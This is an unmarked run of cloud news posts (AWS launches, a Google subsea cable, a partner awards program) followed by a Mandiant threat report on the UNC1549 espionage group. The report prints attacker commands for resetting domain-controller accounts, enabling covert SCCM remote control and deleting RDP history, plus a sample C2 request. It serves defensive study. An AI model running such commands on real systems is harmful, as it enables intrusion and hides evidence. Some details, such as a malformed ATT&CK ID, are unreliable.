Amazon Web Services (AWS) has expanded the regional availability for Amazon WorkSpaces Applications. Starting today, AWS customers can deploy their applications and desktops in the AWS Europe (Milan), Europe (Spain), Asia Pacific (Malaysia), and Israel (Tel Aviv) Regions and stream them using WorkSpaces Applications. Deploying your applications in a region closer to your end users helps provide a more responsive experience.
Amazon WorkSpaces Applications is a fully managed, secure application streaming service that provides users with instant access to their desktop applications from anywhere. It allows users to stream applications and desktops from AWS to their devices, without requiring them to download, install, or manage any software locally. WorkSpaces Applications manages the AWS resources required to host and run your applications, scales automatically, and provides access to your users on demand.
To get started with Amazon WorkSpaces Applications, sign into the WorkSpaces Applications management console and select one of the AWS Region of your choice. For the full list of Regions where WorkSpaces Applications is available, see the AWS Region Table. AppStream 2.0 offers pay-as-you-go pricing. For more information, see Amazon WorkSpaces Applications Pricing.
Today, we’re announcing Dhivaru, a new Trans-Indian Ocean subsea cable system that will connect the Maldives, Christmas Island and Oman. This investment will build on the Australia Connect initiative, furthering the reach, reliability, and resilience of digital connectivity across the Indian Ocean.
Reach, reliability and resilience are integral to the success of AI-driven services for our users and customers. Tremendous adoption of groundbreaking services such as Gemini 2.5 Flash Image (aka Nano Banana) and Vertex AI, mean resilient connectivity has never been more important for our users. The speed of AI adoption is also outpacing anyone’s predictions, and Google is investing to meet this long-term demand.
“Dhivaru” is the line that controls the main sail on traditional Maldivian sailing vessels, and signifies the skill, strength, and experience of the early sailors navigating the seas.
In addition to the cable investment, Google will be investing in creating two new connectivity hubs for the region. The Maldives and Christmas Island are naturally positioned for connectivity hubs to help improve digital connectivity for the region, including Africa, the Middle East, South Asia and Oceania.
“Google’s decision to invest in the Maldives is a strong signal of confidence in our country’s stable and open investment environment, and a direct contribution to my vision for a diversified, inclusive, and digitized Maldivian economy. As the world moves rapidly toward an era defined by digital transformation and artificial intelligence, this project reflects how the Maldives is positioning itself at the crossroads of global connectivity — leveraging our strategic geography to create new economic opportunities for our people and to participate meaningfully in the future of the global economy.” – His Excellency the President of Republic of Maldives
“We are delighted to partner with Google on this landmark initiative to establish a new connectivity hub in the Maldives. This project represents a major step forward in strengthening the nation’s digital infrastructure and enabling the next wave of digital transformation. As a leading digital provider, Ooredoo Maldives continues to expand world-class connectivity and digital services nationwide. This progress opens new opportunities for businesses such as tourism, enabling smarter operations, improved customer experiences and greater global reach. We are proud to be powering the next phase of the Digital Maldives.” – Ooredoo Maldives CEO and MD, Khalid Al Hamadi.
“Dhiraagu is committed to advancing the digital connectivity of the Maldives and empowering our people, communities, and businesses. Over the years, we have made significant investments in building robust subsea cable systems — transforming the digital landscape — connecting the Maldives to the rest of the world and enabling the rollout of high-speed broadband across the nation. We are proud and excited to partner with Google on their expansion of subsea infrastructure and the establishment of a new connectivity hub in Addu City, the southernmost city of the Maldives. This strategic collaboration with one of the world’s largest tech players marks another milestone in strengthening the nation’s presence within the global subsea infrastructure, and further enhances the reliability and resiliency of our digital ecosystem.” – Ismail Rasheed, CEO & MD, DHIRAAGU
Connectivity hubs for the Indian Ocean region
Connectivity hubs are strategic investments designed to future-proof regional connectivity and accelerate the delivery of next-generation services through three core capabilities: Cable switching, content caching, and colocation.
Cable switching: Delivering seamless resilience
Google carefully selects the locations for our connectivity hubs to minimize the distance data has to travel before it has a chance to ‘switch paths’.. This capability improves resilience, and ensures robust, high-availability connectivity across the region. The hubs also allow automatic re-routing of traffic between multiple cables. If one cable experiences a fault, traffic will automatically select the next best path and continue on its way. This ensures high availability not only for the host country, but minimizes downtime for services and users across the region.
Content caching: Accelerating digital services
Low latency is critical for optimal user experience. One of Google’s objectives is to serve content from as close to our users and customers as possible. By caching — storing copies of the most popular content locally — Google can reduce the latency to retrieve or view this content, improving the quality of services.
Colocation: Fostering a local ecosystem
Connectivity hubs are often in locations where users have limited access to high quality data centers to house their services and IT hardware, such as islands. Although these facilities are not very large as compared to a Google data center, Google understands the benefits of shared infrastructure, and is committed to providing rack space to carriers and local companies.
Energy efficiency
Subsea cables are very energy efficient. As a result, even when supporting multiple cables, content storage and colocation, a Google connectivity hub requires far less power than a typical data center. They are primarily focused on networking and localized storage and not the large demands supporting AI, cloud and other important building blocks of the Internet. Of course, the power required for a connectivity hub can still be a lot for some smaller locations, and where it is, Google is exploring using its power demand to accelerate local investment in sustainable energy generation, consistent with its long history of stimulating renewable energy solutions.
These new connectivity hubs in the Maldives and Christmas Island are ideally situated to deepen the resilience of internet infrastructure in the Indian Ocean Region. The facilities will help power our products, strengthen local economies and bring AI benefits to people and businesses around the world. We look forward to announcing future subsea cables and connectivity hubs and further enhancing the Internet’s reach, reliability, and resilience.
You can now designate delegated administrators for AWS Backup in 17 additional AWS Regions, enabling assigned users in member accounts to perform most administrative tasks.
Delegated administrators are now supported in Africa (Cape Town), Asia Pacific (Hong Kong, Hyderabad, Jakarta, Malaysia, Melbourne, New Zealand, Taipei, Thailand), Canada West (Calgary), Europe (Milan, Spain, Zurich), Israel (Tel Aviv), Mexico (Central), and Middle East (Bahrain, UAE). Delegated administration enables organizations to designate a central AWS account to manage backup operations across multiple member accounts, streamlining governance and reducing administrative overhead. Additionally, you can now use AWS Backup Audit Manager cross-Region and cross-account delegated administrator functionality in these Regions, empowering delegated administrators to create audit reports for jobs and compliance for backup plans that span these Regions.
Starting today, Amazon EC2 M8i and M8i-flex instances are now available in Asia Pacific (Mumbai) Region. These instances are powered by custom Intel Xeon 6 processors, available only on AWS, delivering the highest performance and fastest memory bandwidth among comparable Intel processors in the cloud. The M8i and M8i-flex instances offer up to 15% better price-performance, and 2.5x more memory bandwidth compared to previous generation Intel-based instances. They deliver up to 20% better performance than M7i and M7i-flex instances, with even higher gains for specific workloads. The M8i and M8i-flex instances are up to 30% faster for PostgreSQL databases, up to 60% faster for NGINX web applications, and up to 40% faster for AI deep learning recommendation models compared to M7i and M7i-flex instances.
M8i-flex are the easiest way to get price performance benefits for a majority of general-purpose workloads like web and application servers, microservices, small and medium data stores, virtual desktops, and enterprise applications. They offer the most common sizes, from large to 16xlarge, and are a great first choice for applications that don’t fully utilize all compute resources.
M8i instances are a great choice for all general purpose workloads, especially for workloads that need the largest instance sizes or continuous high CPU usage. The SAP-certified M8i instances offer 13 sizes including 2 bare metal sizes and the new 96xlarge size for the largest applications.
Starting today, Amazon EC2 High Memory U7i instances with 12TB of memory (u7i-12tb.224xlarge) are now available in the AWS Europe (Ireland) Region. U7i-12tb instances are part of AWS 7th generation and are powered by custom fourth generation Intel Xeon Scalable Processors (Sapphire Rapids). U7i-12tb instances offer 12TB of DDR5 memory, enabling customers to scale transaction processing throughput in a fast-growing data environment.
U7i-12tb instances offer 896 vCPUs, support up to 100Gbps Elastic Block Storage (EBS) for faster data loading and backups, deliver up to 100Gbps of network bandwidth, and support ENA Express. U7i instances are ideal for customers using mission-critical in-memory databases like SAP HANA, Oracle, and SQL Server..
Today, AWS announced support for Resolver query logging configurations in Amazon Route 53 Profiles, allowing you to manage Resolver query logging configuration and apply it to multiple VPCs and AWS accounts within your organization. With this enhancement, Amazon Route 53 Profiles simplifies the management of Resolver query logging by streamlining the process of associating logging configurations with VPCs, and without requiring you to manually associate them with each VPC.
Route 53 Profiles allows you to create and share Route 53 configurations (private hosted zones, DNS Firewall rule groups, Resolver rules) across multiple VPCs and AWS accounts. Previously, Resolver query logging required you to manually set it up for each VPC in every AWS account. Now, with Route 53 Profiles you can manage your Resolver query logging configurations for your VPCs and AWS accounts, using a single Profile configuration. Profiles support for Resolver query logging configurations reduces the management overhead for network security teams and simplifies compliance auditing by providing consistent DNS query logs across all accounts and VPCs.
Route 53 Profiles support for Resolver query logging is now available in the AWS Regions mentioned here. To learn more about this capability and how it can benefit your organization, visit the Amazon Route 53 documentation. You can get started by accessing the Amazon Route 53 console in your AWS Management Console or through the AWS CLI. To learn more about Route 53 Profiles pricing, see here.
AWS Backup now supports logically air-gapped vaults as a primary backup target. You can assign a logically air-gapped vault as the primary target in backup plans, organization-wide policies, or on-demand backups. Previously, logically air-gapped vaults could only store copies of existing backups.
This capability reduces storage costs for customers who want the security and recoverability benefits of logically air-gapped vaults. Organizations wanting those benefits can now back up directly to a logically air-gapped vault without storing multiple backups.
Resource types that support full AWS Backup management back up directly to the specified air-gapped vault. For resource types without full management support, AWS Backup creates a temporary snapshot in a standard vault, copies it to the air-gapped vault, then removes the snapshot.
This feature is available in all AWS Regions that support logically air-gapped vaults. To get started, select a logically air-gapped vault as your primary backup target in the AWS Backup console, API, or CLI. For more information, visit the AWS Backup product page and documentation.
EC2 Image Builder now supports invoking Lambda functions and executing Step Functions state machine through image workflows. These capabilities enable you to incorporate complex, multi-step workflows and custom validation logic into your image creation process, providing greater flexibility and control over how your images are built and validated.
Prior to this launch, customers had to write custom code and implement multi-step workarounds to integrate Lambda or Step Functions within image workflows. This was a cumbersome process that was time-consuming to set up, difficult to maintain, and prone to errors. With these new capabilities, you can now seamlessly invoke Lambda functions to execute custom logic or orchestrate Step Functions state machines for complex, multi-step workflows. This native integration allows you to implement use cases such as custom compliance validation, sending custom notifications, multi-stage security testing —all within your Image Builder workflow.
These capabilities are available to all customers at no additional costs, in all AWS regions including AWS China (Beijing) Region, operated by Sinnet, AWS China (Ningxia) Region, operated by NWCD, and AWS GovCloud (US) Regions.
You can get started from the EC2 Image Builder Console, CLI, API, CloudFormation, or CDK, and learn more in the EC2 Image Builder documentation.
Today, AWS announced that you can now designate Amazon EC2 instances running license-included SQL Server as part of a High-Availability (HA) cluster to reduce licensing costs with just a few clicks.
This enhancement is particularly valuable for mission-critical SQL Server databases with Always On Availability Groups and/or Always On failover cluster instances. For example, you can save up to 40% of the full HA costs with no performance compromises when running SQL Server HA on two m8i.4xlarge instances with license-included Windows and SQL Server.
This feature is available in all commercial AWS Regions.
To learn more, see Microsoft SQL Server on Amazon EC2 User Guide or read the blog post.
At Google Cloud, we have the honor of partnering with some of the most brilliant and inventive individuals across the world. Each year, the Google Cloud Partner All-stars program honors these remarkable people for their dedication to innovation and commitment to excellence. Our 2025 All-stars are pushing our industry forward, and we’re thrilled to celebrate them.
2025 Spotlight: AI Innovation
For 2025, we’re excited to introduce a new category that recognizes strategic leaders in enterprise-wide AI adoption. These honorees are trusted advisors, helping customers transform their business using Google AI. This includes implementing agentic AI to transform core processes, create new revenue streams, or redefine operating models.
These All-stars showcase a holistic vision for how AIintegrates into a customer’s culture and strategy to drive lasting, measurable transformation that fundamentally alters business processes.
What sets Partner All-stars apart? The following qualities define what it means to be a Partner All-star:
AI Innovation
Guides customers through profound business transformation by driving enterprise-wide AI adoption
Establishes a strategic vision for integrating AI and autonomous agents into a customer’s operating model
Leverages agentic AI to redefine core processes, create new revenue streams, and transform business outcomes
Delivers lasting, measurable results that fundamentally alter a customer’s business processes
Delivery Excellence
Top-ranked personnel on Google Cloud’s Delivery Readiness Portal (DRP)
Displays commitment to technical excellence by passing advanced delivery challenge labs and other advanced technical training
Demonstrates excellent knowledge and adoption of Google Cloud delivery enablement methods, assets, and offerings
Exhibits expertise through customer project and deployment experience
Marketing
Drives strategic programs and key events that address customer concerns and priorities
Works with cross-functional teams to ensure the success of campaigns and events
Takes a data-driven approach to marketing, investing resources and time in programs that drive the biggest impact
Always explores areas of opportunity to improve future work
Sales
Embodies commitment to the customer transformation journey
Consistently meets and exceeds sales targets
Aligns on goals to deliver amazing end-to-end customer experiences
Prioritizes long-term customer relationships over short-term sales
Solutions Engineering
Delivers superior customer experiences by keeping professional skills up to date, earning at least one Google technical certification
Embraces customer challenges head-on, taking responsibility for end-to-end solutioning
Works with purpose, providing deliverables in a timely manner without compromising quality
Works effectively across joint product areas, leveraging technology in innovative ways to address customer needs
Celebrating excellence in 2025
On behalf of the entire Google Cloud team, I want to extend a much-deserved congratulations to our 2025 Google Cloud Partner All-stars. Their commitment to innovation is an inspiration to us and a driving force of success to our customers.
Follow the celebration and engage with #PartnerAllstars on social media to learn more about these exceptional leaders.
Written by: Mohamed El-Banna, Daniel Lee, Mike Stokkel, Josh Goddard
Overview
Last year, Mandiant published a blog post highlighting suspected Iran-nexus espionage activity targeting the aerospace, aviation, and defense industries in the Middle East. In this follow-up post, Mandiant discusses additional tactics, techniques, and procedures (TTPs) observed in incidents Mandiant has responded to.
Since mid-2024, Mandiant has responded to targeted campaigns by the threat group UNC1549 against the aerospace, aviation and defense industries. To gain initial access into these environments, UNC1549 employed a dual approach: deploying well-crafted phishing campaigns designed to steal credentials or deliver malware and exploiting trusted connections with third-party suppliers and partners.
The latter technique is particularly strategic when targeting organizations with high security maturity, such as defense contractors. While these primary targets often invest heavily in robust defenses, their third-party partners may possess less stringent security postures. This disparity provides UNC1549 a path of lesser resistance, allowing them to circumvent the primary target’s main security controls by first compromising a connected entity.
Operating in late 2023 through 2025, UNC1549 employed sophisticated initial access vectors, including abuse of third-party relationships to gain entry (pivoting from service providers to their customers), VDI breakouts from third parties, and highly targeted, role-relevant phishing.
Once inside, the group leverages creative lateral movement techniques, such as stealing victim source code for spear-phishing campaigns that use lookalike domains to bypass proxies, and abusing internal service ticketing systems for credential access. They employ custom tooling, notably DCSYNCER.SLICK—a variant deployed via search order hijacking to conduct DCSync attacks.
UNC1549’s campaign is distinguished by its focus on anticipating investigators and ensuring long-term persistence after detection. They plant backdoors that beacon silently for months, only activating them to regain access after the victim has attempted eradication. They maintain stealth and command and control (C2) using extensive reverse SSH shells (which limit forensic evidence) and domains strategically mimicking the victim’s industry.
Threat Activity
Initial Compromise
A primary initial access vector employed by UNC1549 involved combining targeted social engineering with the exploitation of compromised third-party accounts. Leveraging credentials harvested from vendors, partners, or other trusted external entities, UNC1549 exploited legitimate access pathways inherent in these relationships.
Third-Party Services
Notably, the group frequently abused Citrix, VMWare, and Azure Virtual Desktop and Application services provided by victim organizations to third party partners, collaborators, and contractors. Utilizing compromised third-party credentials, they authenticated to the supplier’s infrastructure, establishing an initial foothold within the network perimeter. Post-authentication, UNC1549 used techniques designed to escape the security boundaries and restrictions of the virtualized Citrix session. This breakout granted them access to the underlying host system or adjacent network segments, and enabled the initiation of lateral movement activities deeper within the target corporate network.
Spear Phishing
UNC1549 utilized targeted spear-phishing emails as one of the methods to gain initial network access. These emails used lures related to job opportunities or recruitment efforts, aiming to trick recipients into downloading and running malware hidden in attachments or links. Figure 1 shows a sample phishing email sent to one of the victims.
Figure 1: Screenshot of a phishing email sent by UNC1549
Following a successful breach, Mandiant observed UNC1549 pivoting to spear-phishing campaigns specifically targeting IT staff and administrators. The goal of this campaign was to obtain credentials with higher permissions. To make these phishing attempts more believable, the attackers often perform reconnaissance first, such as reviewing older emails in already compromised inboxes for legitimate password reset requests or identifying the company’s internal password reset webpages, then crafted their malicious emails to mimic these authentic processes.
Establish Foothold
To maintain persistence within compromised networks, UNC1549 deployed several custom backdoors. Beyond MINIBIKE, which Mandiant discussed in the February 2024 blog post, the group also utilizes other custom malware such as TWOSTROKE and DEEPROOT. Significantly, Mandiant’s analysis revealed that while the malware used for initial targeting and compromises was not unique, every post-exploitation payload identified, regardless of family, had a unique hash. This included instances where multiple samples of the same backdoor variant were found within the same victim network. This approach highlights UNC1549’s sophistication and the considerable effort invested in customizing their tools to evade detection and complicate forensic investigations.
Search Order Hijacking
UNC1549 abused DLL search order hijacking to execute CRASHPAD, DCSYNCER.SLICK, GHOSTLINE, LIGHTRAIL, MINIBIKE, POLLBLEND, SIGHTGRAB, and TWOSTROKE payloads. Using the DLL search order hijacking techniques, UNC1549 achieved a persistent and stealthy way of executing their tooling.
Throughout the different investigations, UNC1549 demonstrated a comprehensive understanding of software dependencies by exploiting DLL search order hijacking in multiple software solutions. UNC1549 has deployed malicious binaries targeting legitimate Fortigate, VMWare, Citrix, Microsoft, and NVIDIA executables. In many cases, the threat actor installed the legitimate software after initial access in order to abuse SOH; however, in other cases, the attacker leveraged software that was already installed on victim systems and then replaced or added the malicious DLLs within the legitimate installation directory, typically with SYSTEM privileges.
TWOSTROKE
TWOSTROKE, a C++ backdoor, utilizes SSL-encrypted TCP/443 connections to communicate with its controllers. This malware possesses a diverse command set, allowing for system information collection, DLL loading, file manipulation, and persistence. While showing some similarities to MINIBIKE, it’s considered a unique backdoor.
Upon execution of TWOSTROKE, it employs a specific routine to generate a unique victim identifier. TWOSTRIKE retrieves the fully qualified DNS computer name using the Windows API function GetComputerNameExW(ComputerNameDnsFullyQualified). This retrieved name then undergoes an XOR encryption process, utilizing the static key. Following the encryption, the resulting binary data is converted into a lowercase hexadecimal string.
Finally, TWOSTROKE extracts the first eight characters of this hexadecimal string, reverses it, and uses it as the victim’s unique bot ID for later communication with the C2 server.
Functionalities
After sending the check in request to the C2 server, the TWOSTROKE C2 server returns with a hex-encoded payload that contains multiple values separated by “@##@.” Depending on the received command, TWOSTROKE can execute one of the following commands:
1: Upload a file to the C2
2: Execute a file or a shell command
3: DLL execution into memory
4: Download file from the C2
5: Get the full victim user name
6: Get the full victim machine name
7: List a directory
8: Delete a file
LIGHTRAIL
UNC1549 was observed downloading a ZIP file from attacker-owned infrastructure. This ZIP file contained the LIGHTRAIL tunneler asVGAuth.dll and was executed through search order hijacking using the VGAuthCLI.exe executable. LIGHTRAIL is a custom tunneler, likely based on the open-source Socks4a proxy, Lastenzug, that communicates using Azure cloud infrastructure.
There are several distinct differences between the LIGHTRAIL sample and the LastenZug source code. These include:
Increasing the MAX_CONNECTIONS from 250 to 5000
Static configuration inside the lastenzug function (wPath and port)
No support for using a proxy server when connecting to the WebSocket C2
Compiler optimizations reducing the number of functions (26 to 10)
Additionally, LastenZug is using hashing for DLLs and API function resolving. By default, the hash value is XOR’d with the value 0x41507712, while the XOR value in the observed LIGHTRAIL sample differs from the original source code – 0x41424344(‘ABCD’).
After loading the necessary API function pointers, the initialization continues by populating the server name (wServerName), the port, and URI (wPath) values. The port is hardcoded at 443 (for HTTPS) and the path is hardcoded to “/news.” This differs from the source code where these values are input parameters to the lastenzug function.
The initWSfunction is responsible for establishing the WebSocket connection, which it does using the Windows WinHTTP API. The initWSfunction has a hard-coded User-Agent string which it constructs as a stack string:
Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Safari/537.36 Edge/12.10136
Mandiant identified another LIGHTRAIL sample uploaded to VirusTotal from Germany. However, this sample seems to have been modified by the uploader as the C2 domain was intentionally altered.
GET https://aaaaaaaaaaaaaaaaaa.bbbbbb.cccccccc.ddddd.com/page HTTP/1.1
Host: aaaaaaaaaaaaaaaaaa.bbbbbb.cccccccc.ddddd.com
Connection: Upgrade
Upgrade: websocket
User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.37 (KHTML, like Gecko) Chrome/42.0.2311.135 Safari/537.36 Edge/12.10136
Sec-WebSocket-Key: 9MeEoJ3sjbWAEed52LdRdg==
Sec-WebSocket-Version: 13
Figure 2: Modified LIGHTRAIL network communication snippet
Most notable is that this sample is using a different URL path for its communication, but also the User-Agent in this sample is different from the one that was observed in previous LIGHTRAIL samples and the LastenZug source code.
DEEPROOT
DEEPROOT is a Linux backdoor written in Golang and supports the following functionalities: shell command execution, system information enumeration and file listing, delete, upload, and download. DEEPROOT was compiled to be operating on Linux systems; however, due to Golang’s architecture DEEPROOT could also be compiled for other operating systems. At the time of writing, Mandiant has not observed any DEEPROOT samples targeting Windows systems.
DEEPROOT was observed using multiple C2 domains hosted in Microsoft Azure. The observed DEEPROOT samples used multiple C2 servers per binary, suspected to be used for redundancy in case one C2 server has been taken down.
Functionalities
After sending the check in request to the C2 server, the DEEPROOT C2 server returns with a hex-encoded payload that contains multiple values separated by ‘-===-’
sleep_timeout is the time in milli-seconds to wait before making the next request.
command_id is an identifier for the C2 command, used by the backdoor when responding to the C2 with the result.
command is the command number and it’s one of the following:
1 – Get directory information (directory listing), the directory path is received in argument_1.
2 – Delete a file, the file path is received in argument_1.
3 – Get the victim username.
4 – Get the victim’s hostname.
5 – Execute a shell command, the shell command is received in argument_1.
6 – Download a file from the C2, the C2 file path is received in argument_1 and the local file path is received in argument_2.
7 – Upload a file to the C2, the local file path is received in argument_1.
argument_1 and argument_2 are the command arguments and it is optional.
GHOSTLINE
GHOSTLINE is a Windows tunneler utility written in Golang that uses a hard-coded domain for its communication. GHOSTLINE uses the go-yamux library for its network connection.
POLLBLEND
POLLBLEND is a Windows tunneler that is written in C++. Earlier iterations of POLLBLEND featured multiple hardcoded C2 servers and utilized two hardcoded URI parameters for self-registration and tunneler configuration download. For the registration of the machine, POLLBLEND would reach out to/register/ and sent a HTTP POST request with the following JSON body.
{"username": "<computer_name>"}
Figure 4: POLLBLEND body data
Code Signing
Throughout the tracking of UNC1549’s activity across multiple intrusions, the Iranian-backed threat group was observed signing some of their backdoor binaries with legitimate code-signing certificates—a tactic also covered by Check Point—likely to help their malware evade detection and bypass security controls like application allowlists, which are often configured to trust digitally signed code. The group employed this technique to weaponize malware samples, including variants for GHOSTLINE, POLLBLEND, and TWOSTROKE. All identified code-signing certificates have been reported to the relevant issuing Certificate Authorities for revocation.
Escalate Privileges
UNC1549 has been observed using a variety of techniques and custom tools aimed at stealing credentials and gathering sensitive data post-compromise. This included a utility, tracked as DCSYNCER.SLICK, designed to mimic the DCSync Active Directory replication feature. DCSync is a legitimate function domain controllers use for replicating changes via RPC. This allowed the attackers to extract NTLM password hashes directly from the domain controllers. Another tool, dubbed CRASHPAD, focused on extracting credentials saved within web browsers. For visual data collection, they deployed SIGHTGRAB, a tool capable of taking periodic screenshots, potentially capturing sensitive information displayed on the user’s screen. Additionally, UNC1549 utilized simpler methods, such as deploying TRUSTTRAP, which presented fake popup windows prompting users to enter their credentials, which were then harvested by the attackers.
UNC1549 frequently used DCSync attacks to obtain NTLM password hashes for domain users, which they then cracked in order to facilitate lateral movement and privilege escalation. To gain the necessary directory replication rights for DCSync, the threat actor employed several methods. They were observed unconventionally resetting passwords for domain controller computer accounts using net.exe. This action typically broke the domain controller functionality of the host and caused an outage, yet it successfully enabled them to perform the DCSync operation and extract sensitive credentials, including those for domain administrators and Azure AD Connect accounts. UNC1549 leveraged other techniques to gain domain replication rights, including creating rogue computer accounts and abusing Resource-Based Constrained Delegation (RBCD) assignments. They also performed Kerberoasting, utilizing obfuscated Invoke-Kerberoast scripts, for credential theft.
net user DC-01$ P@ssw0rd
Figure 5: Example of an UNC1549 net.exe command to reset a domain controller computer account
In some cases, shortly after gaining a foothold on workstations, UNC1549 discovered vulnerable Active Directory Certificate Services templates. They used these to request certificates, allowing them to impersonate higher-privileged user accounts.
UNC1549 also frequently targeted saved credentials within web browsers, either through malicious utilities or by RDP session hijacking. In the latter, the threat actor would identify which user was logged onto a system through quser.exe or wmic.exe, and then RDP to that system with the user’s account to gain access to their active and unlocked web browser sessions.
DCSYNCER.SLICK
DCSYNCER.SLICK is a Windows executable that is based on the Open source Project DCSyncer and is based on Mimikatz source code. DCSYNCER.SLICK has been modified to use Dynamic API resolution and has all its printf statements removed.
Additionally, DCSYNCER.SLICK collects and XOR-encrypts the credentials before writing them to a hardcoded filename and path. The following hardcoded filenames and paths were observed being used by DCSYNCER.SLICK:
To evade detection, UNC1549 executed the malware within the context of a compromised domain controller computer account. They achieved this compromise by manually resetting the account password. Instead of utilizing the standardnetdomcommand, UNC1549 used the Windows commandnet user <computer_name> <password>. Subsequently, they used these newly acquired credentials to execute the DCSYNCER.SLICK payload. This tactic would give the false impression that replication had occurred between two legitimate domain controllers.
CRASHPAD
CRASHPAD is a Windows executable that is written in C++ that decrypts the content of the file config.txtinto the file crash.logby impersonating the explorer.exe user privilege and through the CryptUnprotectDataAPI.
The contents of these files could not be determined because UNC1549 deleted the output after CRASHPAD was executed.
The CRASHPAD configuration and output file paths were hardcoded into the sample, similar to the LOG.txt filename found in the DCSYNCER.SLICK binary.
SIGHTGRAB
SIGHTGRAB is a Windows executable written in C that autonomously captures screen shots at regular intervals and saves them to disk. Upon execution SIGHTGRAB loads several Windows libraries dynamically at runtime including User32.dll, Gdi32.dll, and Ole32.dll. SIGHTGRAB implements runtime API resolution through LoadLibraryA and GetProcAddress calls with encoded strings to access system functions. SIGHTGRAB uses XOR encryption with a single-byte key of 0x41 to decode API function names.
SIGHTGRAB retrieves the current timestamp and uses string interpolation of YYYY-MM-DD-HH-MM on the timestamp to generate the directory name. In this newly created directory, SIGHTGRAB saves all the taken screenshots incrementally.
Figure 6: Examples of screenshot files created by SIGHTGRAB on disk
Mandiant observed UNC1549 strategically deploy SIGHTGRAB on workstations to target users in two categories: those handling sensitive data, allowing for subsequent data exposure and exfiltration, and those with privileged access, enabling privilege escalation and access to restricted systems.
TRUSTTRAP
A malware that serves a Windows prompt to trick the user into submitting their credentials. The captured credentials are saved in cleartext to a file. Figure 7 shows a sample popup by TRUSTTRAP mimicking the Microsoft Outlook login window.
Figure 7: Screenshot showing the fake Microsoft Outlook login window
TRUSTTRAP has been used by UNC1549 since at least 2023 for obtaining user credentials used for lateral movement.
Reconnaissance and Lateral Movement
For internal reconnaissance, UNC1549 leveraged legitimate tools and publicly available utilities, likely to blend in with standard administrative activities. AD Explorer, a valid executable signed by Microsoft, was used to query Active Directory and inspect its configuration details. Alongside this, the group employed native Windows commands like net user and net group to enumerate specific user accounts and group memberships within the domain, and PowerShell scripts for ping and port scanning reconnaissance on specific subnets, typically those associated with privileged servers or IT administrator workstations
UNC1549 uses a wide variety of methods for lateral movement, depending on restrictions within the victim environment. Most frequently, RDP was used. Mandiant also observed the use of PowerShell Remoting, Atelier Web Remote Commander (“AWRC”), and SCCM remote control, including execution of variants of SCCMVNC to enable SCCM remote control on systems.
Atelier Web Remote Commander
Atelier Web Remote Commander (AWRC) is a commercial utility for remotely managing, auditing, and supporting Windows systems. Its key distinction is its agentless design, meaning it requires no software installation or pre-configuration on the remote machine, enabling administrators to connect immediately.
Leveraging the capabilities of AWRC, UNC1549 utilized this publicly available commercial tool to facilitate post-compromise activities. These activities included:
Established remote connections: Used AWRC to connect remotely to targeted hosts within the compromised network
Conducted reconnaissance: Employed AWRC’s built-in functions to gather information by:
Enumerating running services
Enumerating active processes
Enumerating existing RDP sessions
Stole credentials: Exploited AWRC to exfiltrate sensitive browser files known to contain stored user credentials from remote systems
Deployed malware: Used AWRC as a vector to transfer and deploy malware onto compromised machines
SCCMVNC
SCCMVNC is a tool designed to leverage the existing Remote Control feature within Microsoft System Center Configuration Manager (SCCM/ConfigMgr) to achieve a VNC-like remote access experience without requiring additional third-party modules or user consent/notifications.
SCCM.exe reconfig /target:[REDACTED]
Figure 8: Example of an UNC1549 executing SCCMVNC command
The core functionality of SCCMVNC lies in its ability to manipulate the existing Remote Control feature of SCCM. Instead of deploying a separate VNC server or other remote access software, the tool directly interacts with and reconfigures the settings of the native SCCM Remote Control service on a client workstation. This approach leverages an already present and trusted component within the enterprise environment.
A key aspect of SCCMVNC is its capacity to bypass the standard consent and notification mechanisms typically associated with SCCM Remote Control. Normally, when an SCCM remote control session is initiated, the end-user is prompted for permission, and various notification icons or connection bars are displayed. SCCMVNC effectively reconfigures the underlying SCCM settings (primarily through WMI interactions) to disable these user-facing requirements. This alteration allows for a significantly more discreet and seamless remote access experience, akin to what one might expect from a VNC connection where the user might not be immediately aware of the ongoing session.
Command and Control
UNC1549 continued to use Microsoft Azure Web Apps registrations and cloud infrastructure for C2. In addition to backdoors including MINIBUS, MINIBIKE, and TWOSTROKE, UNC1549 relied heavily on SSH reverse tunnels established on compromised systems to forward traffic from their C2 servers to compromised systems. This technique limited the availability of host-based artifacts during investigations, since security telemetry would only record network connections. For example, during data collection from SMB shares, outbound connections were observed from the SSH processes to port 445 on remote systems, but the actual data collected could not be confirmed due to no staging taking place within the victim environment, and object auditing being disabled.
Figure 9: Example of an UNC1549 reverse SSH command
Mandiant also identified evidence of UNC1549 deploying a variety of redundant remote access methods, including ZEROTIER and NGROK. In some instances, these alternative methods weren’t used by the threat actor until victim organizations had performed remediation actions, suggesting they are primarily deployed to retain access.
Complete Mission
Espionage
UNC1549’s operations appear strongly motivated by espionage, with mission objectives centering around extensive data collection from targeted networks. The group actively seeks sensitive information, including network/IT documentation, intellectual property, and emails. Furthermore, UNC1549 often leverages compromised organizations as a pivot point, using their access to target other entities, particularly those within the same industry sector, effectively conducting third-party supplier and partner intrusions to further their intelligence-gathering goals.
Notably, Mandiant responded to one intrusion at an organization in an unrelated sector, and assessed that the intrusion was opportunistic due to the initial spear phishing lure being related to a job at an aerospace and defense organization. This demonstrated UNC1549’s ability to commit resources to expanding access and persistence in victim organizations that don’t immediately meet traditional espionage goals.
Defense Evasion
UNC1549 frequently deleted utilities from compromised systems after execution to avoid detection and hinder investigation efforts. The deletion of forensic artifacts, including RDP connection history registry keys, was also observed. Additionally, as described earlier, the group repeatedly used SSH reverse tunnels from victim hosts back to their infrastructure, a technique which helped hide their activity from EDR agents installed on those systems. Combined, this activity demonstrated an increase in the operational security of UNC1549 over the past year.
reg delete "HKEY_CURRENT_USERSoftwareMicrosoftTerminal Server ClientDefault" /va /f
reg delete "HKEY_CURRENT_USERSoftwareMicrosoftTerminal Server ClientServers" /f
Figure 10: Examples of UNC1549 commands to delete RDP connection history registry keys
Acknowledgement
This analysis would not have been possible without the assistance from across Google Threat Intelligence Group, Mandiant Consulting and FLARE. We would like to specifically thank Greg Sinclair and Mustafa Nasser from FLARE, and Melissa Derr, Liam Smith, Chris Eastwood, Alex Pietz, Ross Inman, and Emeka Agu from Mandiant Consulting.
MITRE ATT&CK
TACTIC
ID
Name
Description
Collection
T1213.002
Data from Information Repositories: SharePoint
UNC1549 browsed Microsoft Teams and SharePoint to download files used for extortion.
Collection
T1113
Screen Capture
UNC1549 was observed making screenshots from sensitive data.
Reconnaissance
T16561598.003
Phishing for Information
UNC1549 used third party vendor accounts to obtain privileged accounts using a Password Reset portal theme.
